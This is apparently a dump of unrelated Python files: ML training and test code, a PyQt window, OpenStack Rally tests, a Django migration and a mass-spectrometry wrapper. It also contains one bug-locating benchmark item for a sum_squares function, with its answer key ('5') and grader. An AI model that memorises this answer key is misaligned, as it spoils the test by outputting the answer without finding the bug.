parser.add_argument("--n_roots", "-n", type=int, default="1",
help="Number of roots to sample the neighborhood from")
parser.add_argument("--hops", "-H", type=int, default="3",
help="Number of hops to sample the neighborhood")
parser.add_argument("--max_nodes_per_hop", "-m", type=int, default="2500",
help="Number of nodes in the neighborhood")
parser.add_argument("--hops_test", "-HT", type=int, default="3",
help="Number of hops to sample the neighborhood")
parser.add_argument("--max_nodes_per_hop_test", "-mt", type=int, default="2500",
help="Number of nodes in the neighborhood")
parser.add_argument("--seed", "-s", type=int, default="28",
help="Numpy random seed")
params = parser.parse_args()
np.random.seed(params.seed)
random.seed(params.seed)
params.main_dir = os.path.join(os.path.relpath(os.path.dirname(os.path.abspath(__file__))), '..')
files = {
'train': os.path.join(params.main_dir, 'data/{}/train.txt'.format(params.dataset)),
'valid': os.path.join(params.main_dir, 'data/{}/valid.txt'.format(params.dataset)),
'test': os.path.join(params.main_dir, 'data/{}/test.txt'.format(params.dataset))
}
main(params)
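# Hedged CLI sketch (the script name is hypothetical; the values shown are the argparse
# defaults above):
#
#     python subsample_graph.py -d FB15K237 -nd fb_v3 -n 1 -H 3 -m 2500 -s 28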
|
import time
import torch
import torch.nn as nn
import torchvision.models
import torchvision.transforms as transform
from torchvision.datasets import DatasetFolder
from PIL import Image
from torch.utils.data import Dataset, DataLoader, ConcatDataset
import numpy as np
import matplotlib.pyplot as plt
config = {
'epoch': 30,
'batch_size': 128,
'device': "cuda",
'optimizer': 'Adam',
'optim_hparas': {
'lr': 0.0001,
'weight_decay': 1e-5,
},
'save_path': 'models/model.pth'
}
# data augmentation
def loader_data(path, mode):
data_tfm = {
'train': transform.Compose([
transform.CenterCrop(224),
transform.RandomHorizontalFlip(0.5),
transform.ColorJitter(brightness=0.5),
transform.RandomAffine(degrees=20, translate=(0.2, 0.2), scale=(0.7, 1.3)),
transform.ToTensor()
]),
'test': transform.Compose([
transform.CenterCrop(224),
transform.ToTensor()
])
}
def imgs_tfm(path):
x = Image.open(path)
x = x.resize((256, 256))
return x
data = DatasetFolder(path, loader=imgs_tfm, extensions="jpg", transform=data_tfm['test'])
if mode == 'train':
argu_data = DatasetFolder(path, loader=imgs_tfm, extensions='jpg', transform=data_tfm['train'])
data = ConcatDataset([data, argu_data])
return data
def train(model, train_loader, test_loader, device):
n_epochs = config['epoch']
epoch = 0
optimizer = getattr(torch.optim, config['optimizer'])(model.parameters(), **config['optim_hparas'])
criterion = nn.CrossEntropyLoss()
best_acc = 0.0
tr_loss_record = []
tr_acc_record = []
val_loss_record = []
val_acc_record = []
while epoch < n_epochs:
epoch_start_time = time.time()
model.train()
train_loss = []
train_acc = []
for imgs, labels in train_loader:
imgs, labels = imgs.to(device), labels.to(device)
logits = model(imgs)
loss = criterion(logits, labels)
optimizer.zero_grad()
loss.backward()
grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)
optimizer.step()
acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()
train_loss.append(loss.item())
train_acc.append(acc.item())
train_loss = sum(train_loss) / len(train_loss)
train_acc = sum(train_acc) / len(train_acc)
print(
f"[ 训练 |epoch: {epoch + 1:03d} / {n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}, 耗时: {time.time() - epoch_start_time:2.2f}s")
val_loss, val_acc = dev(model, test_loader, device)
print(
f"[ 验证 |epoch: {epoch + 1:03d} / {n_epochs:03d} ] loss = {val_loss:.5f}, acc = {val_acc:.5f}, 耗时: {time.time() - epoch_start_time:2.2f}s")
if val_acc > best_acc:
best_acc = val_acc
torch.save(model.state_dict(), config['save_path'])
val_loss_record.append(val_loss)
val_acc_record.append(val_acc)
tr_loss_record.append(train_loss)
tr_acc_record.append(train_acc)
epoch += 1
return tr_loss_record, tr_acc_record, val_loss_record, val_acc_record
def dev(model, valid_loader, device):
model.eval()
criterion = nn.CrossEntropyLoss()
dev_loss = []
dev_acc = []
for imgs, labels in valid_loader:
imgs = imgs.to(device)
labels = labels.to(device)
with torch.no_grad():
logits = model(imgs)
# loss = model.cal_loss(logits, labels)
loss = criterion(logits, labels)
acc = (logits.argmax(dim=-1) == labels).float().mean()
dev_loss.append(loss.item())
dev_acc.append(acc.item())
dev_loss = sum(dev_loss) / len(dev_loss)
dev_acc = sum(dev_acc) / len(dev_acc)
return dev_loss, dev_acc
# Test entry point: pass in the model, the test data loader, and the device (cuda)
def test(model, test_loader, device):
model.eval()
preds = []
for imgs, labels in test_loader:
with torch.no_grad():
logits = model(imgs.to(device))
preds.extend(logits.argmax(dim=-1).cpu().numpy().tolist())
return preds
def drawAcc(tr_acc, val_acc):
x = np.arange(len(tr_acc))
plt.plot(x, tr_acc, color="blue", label="Train")
plt.plot(x, val_acc, color="red", label="Test")
plt.legend(loc="upper right")
plt.show()
def drawLoss(tr_loss, val_loss):
x = np.arange(len(tr_loss))
plt.plot(x, tr_loss, color="blue", label="Train")
plt.plot(x, val_loss, color="red", label="Test")
plt.legend(loc="upper right")
plt.show()
if __name__ == '__main__':
train_path = "../data/tumor/Training"
test_path = "../data/tumor/Testing"
device = config['device']
train_set = loader_data(train_path, 'train')
test_set = loader_data(test_path, 'test')
train_loader = DataLoader(train_set, config['batch_size'], shuffle=True, num_workers=0)
test_loader = DataLoader(test_set, config['batch_size'], shuffle=False, num_workers=0)
model = torchvision.models.resnet34(pretrained=True).to(device)
num_ftrs = model.fc.in_features
model.fc = torch.nn.Linear(num_ftrs, 4).to(device)
model.device = device
for param in model.parameters():
param.requires_grad = True
tr_loss_record, tr_acc_record, val_loss_record, val_acc_record = train(model, train_loader, test_loader, device)
drawAcc(tr_acc_record, val_acc_record)
drawLoss(tr_loss_record, val_loss_record)
    # To run inference with this model, load the test data above.
    # The model checkpoint is saved under the models directory.
    # preds = test(model, test_loader, device)
|
'''
Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved.
Copyright 2018. UChicago Argonne, LLC. This software was produced
under U.S. Government contract DE-AC02-06CH11357 for Argonne National
Laboratory (ANL), which is operated by UChicago Argonne, LLC for the
U.S. Department of Energy. The U.S. Government has rights to use,
reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR
UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR
ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is
modified to produce derivative works, such modified software should
be clearly marked, so as not to confuse it with the version available
from ANL.
Additionally, redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of UChicago Argonne, LLC, Argonne National
Laboratory, ANL, the U.S. Government, nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago
Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
# Initial Author <2018>: Arthur Glowacki
from PyQt5.QtWidgets import QMainWindow, QAction
from StreamViewer import XrfStreamViewer
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
action_new_xrf_stream = QAction('New XRF Stream Viewer', self)
fileMenu = self.menuBar().addMenu('&File')
fileMenu.addAction(action_new_xrf_stream)
action_new_xrf_stream.triggered.connect(self.on_new_xrf_stream_widget)
self.resize(1024, 768)
def on_new_xrf_stream_widget(self):
self.xrf_stream_viewer = XrfStreamViewer()
self.xrf_stream_viewer.show()
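if __name__ == '__main__':
    # Hedged launcher sketch (not part of the original file): a QApplication event loop
    # is required before the window can be shown.
    import sys
    from PyQt5.QtWidgets import QApplication
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())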
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally.plugins.openstack.scenarios.fuel import utils
from tests.unit import test
UTILS = "rally.plugins.openstack.scenarios.fuel.utils."
class ModuleTestCase(test.TestCase):
@mock.patch(UTILS + "six")
@mock.patch(UTILS + "FuelClient", return_value="fuel_client")
def test_fuel(self, mock_fuel_client, mock_six):
mock_six.moves.urllib.parse.urlparse().hostname = "foo_host"
client = utils.Fuel(
mock.Mock(username="foo_user", password="foo_pass"),
{}, {}).create_client()
mock_fuel_client.assert_called_once_with(
version="v1", server_address="foo_host", server_port=8000,
username="foo_user", password="foo_pass")
self.assertEqual("fuel_client", client)
class FuelEnvTestCase(test.TestCase):
def test___init__(self):
env = utils.FuelEnvManager("some_client")
self.assertEqual("some_client", env.client)
def test_get(self):
client = mock.Mock()
fenv = utils.FuelEnvManager(client)
result = fenv.get("some_id")
client.get_by_id.assert_called_once_with("some_id")
self.assertEqual(result, client.get_by_id("some_id"))
client.get_by_id.side_effect = BaseException
self.assertIsNone(fenv.get("some_id"))
def test_list(self):
client = mock.Mock()
envs = [
{"name": "one"},
{"name": "two"},
{"name": "three"}]
client.get_all.return_value = envs
fenv = utils.FuelEnvManager(client)
self.assertEqual(envs, fenv.list())
def test_list_exception(self):
client = mock.Mock()
client.get_all = mock.Mock(side_effect=SystemExit)
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.list)
def test_create(self):
client = mock.Mock()
client.create.return_value = "env"
fenv = utils.FuelEnvManager(client)
kwargs = {"release_id": 42, "network_provider": "testprov",
"deployment_mode": "some_mode", "net_segment_type": "bar"}
self.assertEqual("env", fenv.create("some_env", **kwargs))
client.create.assert_called_once_with("some_env", 42, "testprov",
"some_mode", "bar")
client.create.side_effect = SystemExit
self.assertRaises(RuntimeError, fenv.create, "some_env", **kwargs)
def test_create_env_not_returned(self):
client = mock.Mock()
client.create.return_value = None
kwargs = {"release_id": 42, "network_provider": "testprov",
"deployment_mode": "some_mode", "net_segment_type": "bar"}
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.create, "some_env", **kwargs)
@mock.patch(UTILS + "scenario.OpenStackScenario")
def test_delete(self, mock_open_stack_scenario):
mock_open_stack_scenario.RESOURCE_NAME_PREFIX = ""
envs = [{"id": "some_one", "name": "one"}]
client = mock.Mock()
client.get_all.return_value = envs
client.delete_by_id.side_effect = SystemExit
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.delete, "some_one", retries=2)
self.assertEqual(3, len(client.delete_by_id.mock_calls))
@mock.patch(UTILS + "scenario.OpenStackScenario")
def test_delete_error(self, mock_open_stack_scenario):
mock_open_stack_scenario.RESOURCE_NAME_PREFIX = ""
envs = [{"id": "some_one", "name": "one"}]
client = mock.Mock()
client.delete_by_id.side_effect = SystemExit
client.get_all.return_value = envs
fenv = utils.FuelEnvManager(client)
self.assertRaises(RuntimeError, fenv.delete, "some_one", retries=1)
self.assertEqual(2, len(client.delete_by_id.mock_calls))
class FuelClientTestCase(test.TestCase):
@mock.patch(UTILS + "FuelEnvManager")
@mock.patch(UTILS + "os")
def test___init__(self, mock_os, mock_fuel_env_manager):
mock_os.environ = {}
mock_fuelclient = mock.Mock(get_client=lambda *args, **kw: [args, kw])
with mock.patch.dict("sys.modules", {"fuelclient": mock_fuelclient}):
client = utils.FuelClient(version="foo_version",
server_address="foo_address",
server_port=1234,
username="foo_user",
password="foo_pass")
expected_environ = {"KEYSTONE_PASS": "foo_pass",
"KEYSTONE_USER": "foo_user",
"LISTEN_PORT": "1234",
"SERVER_ADDRESS": "foo_address"}
self.assertEqual(expected_environ, mock_os.environ)
self.assertEqual(mock_fuel_env_manager.return_value,
client.environment)
self.assertEqual([("node",), {"version": "foo_version"}],
client.node)
self.assertEqual([("task",), {"version": "foo_version"}],
client.task)
mock_fuel_env_manager.assert_called_once_with(
[("environment",),
{"version": "foo_version"}])
class FuelScenarioTestCase(test.ScenarioTestCase):
def test__list_environments(self):
scenario = utils.FuelScenario(self.context)
self.assertEqual(
scenario._list_environments(),
self.admin_clients("fuel").environment.list.return_value)
self.admin_clients("fuel").environment.list.assert_called_once_with()
self._test_atomic_action_timer(scenario.atomic_actions(),
"fuel.list_environments")
def test__create_environment(self):
self.admin_clients("fuel").environment.create.return_value = {"id": 42}
fuel_scenario = utils.FuelScenario()
fuel_scenario.admin_clients = self.admin_clients
fuel_scenario.generate_random_name = mock.Mock()
result = fuel_scenario._create_environment()
self.assertEqual(
self.admin_clients("fuel").environment.create.return_value["id"],
result)
tmp_mck = self.admin_clients("fuel").environment.create
tmp_mck.assert_called_once_with(
fuel_scenario.generate_random_name.return_value, 1, "neutron",
"ha_compact", "vlan")
def test__delete_environment(self):
fuel_scenario = utils.FuelScenario()
fuel_scenario.admin_clients = self.admin_clients
fuel_scenario._delete_environment(42, 33)
tmp_mock = fuel_scenario.admin_clients("fuel")
tmp_mock.environment.delete.assert_called_once_with(42, 33)
def test__add_nodes(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen._add_node("1", ["42"], node_roles=["some_role"])
tmp_mock = fscen.admin_clients.return_value.environment.client
tmp_mock.add_nodes.assert_called_once_with("1", ["42"], ["some_role"])
def test__add_nodes_error(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
tmp_mock = fscen.admin_clients.return_value.environment.client
tmp_mock.add_nodes.side_effect = BaseException
self.assertRaises(RuntimeError, fscen._add_node, "1", "42",
node_roles="some_role")
@mock.patch(UTILS + "FuelClient")
def test__remove_nodes(self, mock_fuel_client):
mock_tmp = mock_fuel_client.fuelclient_module.objects
mock_env = mock_tmp.environment.Environment
mock_env.return_value = mock.Mock()
fscen = utils.FuelScenario()
fscen._remove_node("1", "2")
mock_env.assert_called_once_with("1")
mock_env.return_value.unassign.assert_called_once_with(["2"])
@mock.patch(UTILS + "FuelClient")
def test__remove_nodes_error(self, mock_fuel_client):
mock_tmp = mock_fuel_client.fuelclient_module.objects
mock_env = mock_tmp.environment.Environment
mock_env.return_value = mock.Mock()
mock_env.return_value.unassign.side_effect = BaseException
fscen = utils.FuelScenario()
self.assertRaises(RuntimeError, fscen._remove_node, "1", "2")
def test__list_node_ids(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen.admin_clients.return_value.node.get_all.return_value = [
{"id": "id1"}, {"id": "id2"}]
res = fscen._list_node_ids("env")
self.assertEqual(["id1", "id2"], res)
tmp_mock = fscen.admin_clients.return_value.node.get_all
tmp_mock.assert_called_once_with(environment_id="env")
def test__node_is_assigned(self):
fscen = utils.FuelScenario()
fscen.admin_clients = mock.Mock()
fscen.admin_clients.return_value.node.get_by_id.return_value = {
"id": "id1", "cluster": "some_id"}
self.assertTrue(fscen._node_is_assigned("id1"))
fscen.admin_clients.return_value.node.get_by_id.return_value[
"cluster"] = ""
self.assertFalse(fscen._node_is_assigned("id2"))
@mock.patch(UTILS + "FuelScenario._node_is_assigned", return_value=False)
@mock.patch(UTILS + "FuelScenario._list_node_ids",
return_value=["id1", "id2"])
def test__get_free_node_id(self, mock__list_node_ids,
mock__node_is_assigned):
node_id = utils.FuelScenario()._get_free_node_id()
self.assertIn(node_id, mock__list_node_ids.return_value)
@mock.patch(UTILS + "FuelScenario._node_is_assigned", return_value=True)
@mock.patch(UTILS + "FuelScenario._list_node_ids",
return_value=["id1", "id2"])
def test__get_free_node_id_exception(self, mock__list_node_ids,
mock__node_is_assigned):
self.assertRaises(RuntimeError,
utils.FuelScenario()._get_free_node_id)
|
def sum_squares(lst):
""""
This function will take a list of integers. For all entries in the list, the function shall square the integer entry if its index is a
multiple of 3 and will cube the integer entry if its index is a multiple of 4 and not a multiple of 3. The function will not
change the entries in the list whose indexes are not a multiple of 3 or 4. The function shall then return the sum of all entries.
Examples:
For lst = [1,2,3] the output should be 6
For lst = [] the output should be 0
For lst = [-1,-5,2,-1,-5] the output should be -126
Example solution:
# line 1
result =[]
# line 2
for i in range(len(lst)):
# line 3
if i %3 == 0:
# line 4
result.append(lst[i]**2)
# line 5
elif i % 4 == 0 and i%3 == 0:
# line 6
result.append(lst[i]**3)
# line 7
else:
# line 8
result.append(lst[i])
# line 9
return sum(result)
"""
# Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4
# END OF CONTEXT
print("5")
# END OF SOLUTION
def check(candidate):
import io
from contextlib import redirect_stdout
f = io.StringIO()
with redirect_stdout(f):
candidate([])
out = f.getvalue().strip('\n')
assert "5" == out
for i in range(0, 10):
if i != 5:
assert str(i) != out
if __name__ == '__main__':
check(sum_squares)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('billing', '0012_product_is_food'),
('billing', '0015_merge'),
]
operations = [
]
|
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.generated import Generated
from ..types import UNSET, Unset
T = TypeVar("T", bound="CredDefValuePrimary")
@attr.s(auto_attribs=True)
class CredDefValuePrimary:
""" """
n: Union[Unset, str] = UNSET
r: Union[Unset, Generated] = UNSET
rctxt: Union[Unset, str] = UNSET
s: Union[Unset, str] = UNSET
z: Union[Unset, str] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
n = self.n
r: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.r, Unset):
r = self.r.to_dict()
rctxt = self.rctxt
s = self.s
z = self.z
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if n is not UNSET:
field_dict["n"] = n
if r is not UNSET:
field_dict["r"] = r
if rctxt is not UNSET:
field_dict["rctxt"] = rctxt
if s is not UNSET:
field_dict["s"] = s
if z is not UNSET:
field_dict["z"] = z
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
n = d.pop("n", UNSET)
_r = d.pop("r", UNSET)
r: Union[Unset, Generated]
if isinstance(_r, Unset):
r = UNSET
else:
r = Generated.from_dict(_r)
rctxt = d.pop("rctxt", UNSET)
s = d.pop("s", UNSET)
z = d.pop("z", UNSET)
cred_def_value_primary = cls(
n=n,
r=r,
rctxt=rctxt,
s=s,
z=z,
)
cred_def_value_primary.additional_properties = d
return cred_def_value_primary
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
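# Round-trip sketch (illustrative, not part of the generated client): keys that are not
# declared attributes survive a from_dict()/to_dict() cycle via `additional_properties`.
#
#   primary = CredDefValuePrimary.from_dict({"n": "0x1", "s": "0x2", "extra": "kept"})
#   primary["extra"]          # -> "kept"
#   primary.to_dict()["n"]    # -> "0x1"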
|
from __future__ import annotations
from fisher_py.net_wrapping import NetWrapperBase, ThermoFisher
from typing import List
from fisher_py.data.business import Range, TraceType
from fisher_py.utils import to_net_list
class ChromatogramTraceSettings(NetWrapperBase):
"""
Setting to define a chromatogram Trace.
"""
_wrapped_type = ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings
def __init__(self, *args):
super().__init__()
if len(args) == 0:
self._wrapped_object = self._wrapped_type()
elif len(args) == 1:
arg = args[0]
if type(arg) is ChromatogramTraceSettings:
self._wrapped_object = self._wrapped_type(arg._get_wrapped_object_())
elif type(arg) is TraceType:
self._wrapped_object = self._wrapped_type(arg.value)
else:
raise ValueError('Unable to create chromatogram trace settings')
elif len(args) == 2:
filter_, range_ = args
assert type(filter_) is str
assert type(range_) is Range
self._wrapped_object = self._wrapped_type(filter_, range_._get_wrapped_object_())
@property
def mass_range_count(self) -> int:
"""
Gets or sets the number of mass ranges, or wavelength ranges for PDA.
Value:
Numeric count of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
return self._get_wrapped_object_().MassRangeCount
@mass_range_count.setter
def mass_range_count(self, value: int):
"""
Gets or sets the number of mass ranges, or wavelength ranges for PDA.
Value:
Numeric count of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(value) is int
self._get_wrapped_object_().MassRangeCount = value
@property
def include_reference(self) -> bool:
"""
Gets or sets a value indicating whether reference and exception peaks are included
in this chromatogram trace
"""
return self._get_wrapped_object_().IncludeReference
@include_reference.setter
def include_reference(self, value: bool):
"""
Gets or sets a value indicating whether reference and exception peaks are included
in this chromatogram trace
"""
assert type(value) is bool
self._get_wrapped_object_().IncludeReference = value
@property
def fragment_mass(self) -> float:
"""
Gets or sets the fragment mass for neutral fragment filters.
Value:
Floating point fragment mass for neutral fragment filters
"""
return self._get_wrapped_object_().FragmentMass
@fragment_mass.setter
def fragment_mass(self, value: float):
"""
Gets or sets the fragment mass for neutral fragment filters.
Value:
Floating point fragment mass for neutral fragment filters
"""
assert type(value) is float
self._get_wrapped_object_().FragmentMass = value
@property
def filter(self) -> str:
"""
Gets or sets the filter used in searching scans during trace build
"""
return self._get_wrapped_object_().Filter
@filter.setter
def filter(self, value: str):
"""
Gets or sets the filter used in searching scans during trace build
"""
assert type(value) is str
self._get_wrapped_object_().Filter = value
@property
def delay_in_min(self) -> float:
"""
Gets or sets the delay in minutes.
Value:
Floating point delay in minutes
"""
return self._get_wrapped_object_().DelayInMin
@delay_in_min.setter
def delay_in_min(self, value: float):
"""
Gets or sets the delay in minutes.
Value:
Floating point delay in minutes
"""
assert type(value) is float
self._get_wrapped_object_().DelayInMin = value
@property
def trace(self) -> TraceType:
"""
Gets or sets the type of trace to construct
Value:
see ThermoFisher.CommonCore.Data.Business.TraceType for more details
"""
return TraceType(self._get_wrapped_object_().Trace)
@trace.setter
def trace(self, value: TraceType):
"""
Gets or sets the type of trace to construct
Value:
see ThermoFisher.CommonCore.Data.Business.TraceType for more details
"""
assert type(value) is TraceType
self._get_wrapped_object_().Trace = value.value
@property
def mass_ranges(self) -> List[Range]:
"""
Gets or sets the mass ranges.
Value:
Array of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
return [Range._get_wrapper_(r) for r in self._get_wrapped_object_().MassRanges]
@mass_ranges.setter
def mass_ranges(self, value: List[Range]):
"""
Gets or sets the mass ranges.
Value:
Array of mass ranges
Remarks:
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(value) is list
#value = to_net_list([r._get_wrapped_object_() for r in value], Range._wrapped_type)
value = [r._get_wrapped_object_() for r in value]
self._get_wrapped_object_().MassRanges = value
@property
def compound_names(self) -> List[str]:
"""
Gets or sets the compound names.
"""
return self._get_wrapped_object_().CompoundNames
@compound_names.setter
def compound_names(self, value: List[str]):
"""
Gets or sets the compound names.
"""
assert type(value) is list
value = to_net_list(value, str)
self._get_wrapped_object_().CompoundNames = value
def clone(self) -> ChromatogramTraceSettings:
"""
        Copies all of the items from this object into the returned object.
Returns:
The clone.
"""
        return ChromatogramTraceSettings._get_wrapper_(self._get_wrapped_object_().Clone())
def get_mass_range(self, index: int) -> Range:
"""
Gets a range value at 0-based index.
Parameters:
index:
Index at which to retrieve the range
Returns:
            ThermoFisher.CommonCore.Data.Business.Range value at the given index
Remarks:
Use ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.MassRangeCount
to find out the count of mass ranges.
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(index) is int
        return Range._get_wrapper_(self._get_wrapped_object_().GetMassRange(index))
def set_mass_range(self, index: int, range: Range):
"""
Sets a range value at 0-based index.
Parameters:
index:
Index at which new range value is to be set
range:
New ThermoFisher.CommonCore.Data.Business.Range value to be set
Remarks:
Set count of mass ranges using ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.MassRangeCount
before setting any mass ranges.
If ThermoFisher.CommonCore.Data.Business.ChromatogramTraceSettings.Trace is MassRange
then mass range values are used to build trace.
"""
assert type(index) is int
assert type(range) is Range
        self._get_wrapped_object_().SetMassRange(index, range._get_wrapped_object_())
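# Usage sketch (illustrative; it needs the ThermoFisher CommonCore assemblies that
# fisher_py wraps, and it assumes TraceType exposes a TIC member -- substitute the
# trace type and filter string appropriate for your raw file):
#
#   settings = ChromatogramTraceSettings(TraceType.TIC)
#   settings.filter = 'ms'        # only scans matching this filter contribute to the trace
#   settings.delay_in_min = 0.0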
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from sklearn.compose import ColumnTransformer
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.datasets import make_classification
from sklearn.datasets import make_regression
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.impute import SimpleImputer
from sklearn.inspection import permutation_importance
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import KBinsDiscretizer
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import scale
from sklearn.utils import parallel_backend
from sklearn.utils._testing import _convert_container
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_permutation_importance_correlated_feature_regression(n_jobs):
    # Make sure that a feature highly correlated with the target gets a higher
    # importance
rng = np.random.RandomState(42)
n_repeats = 5
X, y = load_boston(return_X_y=True)
y_with_little_noise = (
y + rng.normal(scale=0.001, size=y.shape[0])).reshape(-1, 1)
X = np.hstack([X, y_with_little_noise])
clf = RandomForestRegressor(n_estimators=10, random_state=42)
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng, n_jobs=n_jobs)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y was added as the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] >
result.importances_mean[:-1])
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_permutation_importance_correlated_feature_regression_pandas(n_jobs):
pd = pytest.importorskip("pandas")
    # Make sure that a feature highly correlated with the target gets a higher
    # importance
rng = np.random.RandomState(42)
n_repeats = 5
dataset = load_iris()
X, y = dataset.data, dataset.target
y_with_little_noise = (
y + rng.normal(scale=0.001, size=y.shape[0])).reshape(-1, 1)
# Adds feature correlated with y as the last column
X = pd.DataFrame(X, columns=dataset.feature_names)
X['correlated_feature'] = y_with_little_noise
clf = RandomForestClassifier(n_estimators=10, random_state=42)
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng, n_jobs=n_jobs)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y was added as the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
def test_permutation_importance_mixed_types():
rng = np.random.RandomState(42)
n_repeats = 4
# Last column is correlated with y
X = np.array([[1.0, 2.0, 3.0, np.nan], [2, 1, 2, 1]]).T
y = np.array([0, 1, 0, 1])
clf = make_pipeline(SimpleImputer(), LogisticRegression(solver='lbfgs'))
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y is the last column and should
# have the highest importance
assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
# use another random state
rng = np.random.RandomState(0)
result2 = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result2.importances.shape == (X.shape[1], n_repeats)
assert not np.allclose(result.importances, result2.importances)
# the correlated feature with y is the last column and should
# have the highest importance
assert np.all(result2.importances_mean[-1] > result2.importances_mean[:-1])
def test_permutation_importance_mixed_types_pandas():
pd = pytest.importorskip("pandas")
rng = np.random.RandomState(42)
n_repeats = 5
# Last column is correlated with y
X = pd.DataFrame({'col1': [1.0, 2.0, 3.0, np.nan],
'col2': ['a', 'b', 'a', 'b']})
y = np.array([0, 1, 0, 1])
num_preprocess = make_pipeline(SimpleImputer(), StandardScaler())
preprocess = ColumnTransformer([
('num', num_preprocess, ['col1']),
('cat', OneHotEncoder(), ['col2'])
])
clf = make_pipeline(preprocess, LogisticRegression(solver='lbfgs'))
clf.fit(X, y)
result = permutation_importance(clf, X, y, n_repeats=n_repeats,
random_state=rng)
assert result.importances.shape == (X.shape[1], n_repeats)
# the correlated feature with y is the last column and should
# have the highest importance
